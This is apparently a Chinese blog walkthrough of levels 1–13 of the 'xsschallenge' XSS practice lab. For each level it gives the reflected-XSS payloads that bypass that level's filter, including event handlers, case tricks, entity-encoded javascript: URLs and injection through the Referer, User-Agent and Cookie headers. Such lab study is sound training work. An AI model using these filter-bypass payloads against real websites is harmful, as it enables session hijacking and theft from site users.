xsschallenge靶场练习1-13关

文章目录

第一关

观察页面

php 复制代码
http://192.168.80.139/xsschallenge/level1.php?name=test

尝试在name=后面输入最近基本的xss语法

js 复制代码
<script>alert(1)</script>

第二关

查看页面源代码

可以通过构造闭合

js 复制代码
"> <script>alert(1)</script>

第三关

查看页面源代码

发现过滤了特殊字符

通过单引号闭合,使用触发事件来绕过

js 复制代码
' οnclick='alert(/xss/)

第四关

过滤了< >标签

可是试着尝试上一关的方法

js 复制代码
" οnclick="alert(1)

第五关

通过查看源码得知,替换了scriptscr_ipt

使用大写绕过,看看是否可行

js 复制代码
<SCRIPT>alert(10)</SCRIPT>

发现还是不行,后端把 我们输入的大写,替换成了小写

尝试其他方法绕过,使用伪协议

js 复制代码
"> <a href=javascript:alert(1)>demo</a>

第六关

输入<script>alert(1)</script>测试,查看源代码,依旧替换了script

js 复制代码
"><Img sRc=# OnErRoR=alert(/xss/);>

第七关

使用上一关的通过代码,发现把on给过滤掉 了,还把href给过滤了

我们可以尝试点击事件,双写on,来绕过

js 复制代码
" oonnclick=alert(1)//

第八关

在页面输入框中输入" onclick=alert(1)//

查看页面源代码,发现双引号被做了转义,只能通过其他方式去绕过

可以↓方式去绕过

js 复制代码
j&#9;avasc&#10;r&#13;ipt:alert(/xss/)

第九关

js 复制代码
j&#9;avasc&#10;r&#13;ipt:alert('http://')

第十关

没有输入框可以在地址栏中绕过

js 复制代码
192.168.80.139/xsschallenge/level10.php?keyword=<script>alert(1)</script>

页面没有反应,

查看页面源代码,发现三个隐藏起来的输入框

可以尝试使用t_link\t_history\t_sort这三个 挨个尝试

发现只有 在t_sort输入的时候,才有变化

js 复制代码
http://192.168.80.139/xsschallenge/level10.php?t_sort=<script>alert(1)</script>

构造其他方法

js 复制代码
" type="test" οnclick="alert(1)

第十一关

代码审计

php 复制代码
$str = $_GET["keyword"];
$str00 = $_GET["t_sort"];
$str11=$_SERVER['HTTP_REFERER'];
$str22=str_replace(">","",$str11);
$str33=str_replace("<","",$str22);
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
<form id=search>
<input name="t_link"  value="'.'" type="hidden">
<input name="t_history"  value="'.'" type="hidden">
<input name="t_sort"  value="'.htmlspecialchars($str00).'" type="hidden">
<input name="t_ref"  value="'.$str33.'" type="hidden">

查看页面代码

发现t_refvalue值是第十关的 地址

js 复制代码
" type="button" οnclick="alert(1)

也可以使用bp抓取数据包修改Referer字段的值

第十二关

代码审计

php 复制代码
$str = $_GET["keyword"];
$str00 = $_GET["t_sort"];
$str11=$_SERVER['HTTP_USER_AGENT'];
$str22=str_replace(">","",$str11);
$str33=str_replace("<","",$str22);
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
<form id=search>
<input name="t_link"  value="'.'" type="hidden">
<input name="t_history"  value="'.'" type="hidden">
<input name="t_sort"  value="'.htmlspecialchars($str00).'" type="hidden">
<input name="t_ua"  value="'.$str33.'" type="hidden">
js 复制代码
" type="button" οnmοuseοver="alert(1)"

第十三关

代码审计

php 复制代码
$str = $_GET["keyword"];
$str00 = $_GET["t_sort"];
$str11=$_COOKIE["user"];
$str22=str_replace(">","",$str11);
$str33=str_replace("<","",$str22);
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
<form id=search>
<input name="t_link"  value="'.'" type="hidden">
<input name="t_history"  value="'.'" type="hidden">
<input name="t_sort"  value="'.htmlspecialchars($str00).'" type="hidden">
<input name="t_cook"  value="'.$str33.'" type="hidden">
php 复制代码
user=" type="button" οnmοuseοver="alert(1)"
相关推荐
2501_916008892 分钟前
iOS App抓包工具排查后台唤醒引发请求异常
websocket·网络协议·tcp/ip·http·网络安全·https·udp
Bruce_Liuxiaowei3 小时前
安全分析:Zabbix 路径探测请求解析
安全·网络安全·zabbix
武汉唯众智创3 小时前
高职院校“赛岗课”一体化网络安全实战类人才培养方案
网络·安全·web安全·网络安全·“赛岗课”一体化·赛岗课
2501_915918414 小时前
iPhone 抓包工具有哪些?多工具对比分析优缺点
websocket·网络协议·tcp/ip·http·网络安全·https·udp
游戏开发爱好者88 小时前
iOS 出海 App 安全加固指南:无源码环境下的 IPA 加固与防破解方法
websocket·网络协议·tcp/ip·http·网络安全·https·udp
2501_915921438 小时前
苹果App上架流程:不用Mac也可以上架的方法
websocket·网络协议·tcp/ip·http·网络安全·https·udp
weixin_472339468 小时前
网络安全之XSS漏洞:原理、危害与防御实践
安全·web安全·xss
网硕互联的小客服11 小时前
服务器经常出现蓝屏是什么原因导致的?如何排查和修复?
运维·服务器·stm32·单片机·网络安全
2501_9160074713 小时前
iOS 性能测试工具全流程:主流工具实战对比与适用场景
websocket·tcp/ip·http·网络安全·https·udp
独行soc1 天前
2025年渗透测试面试题总结-2025年HW(护网面试) 33(题目+回答)
linux·科技·安全·网络安全·面试·职场和发展·护网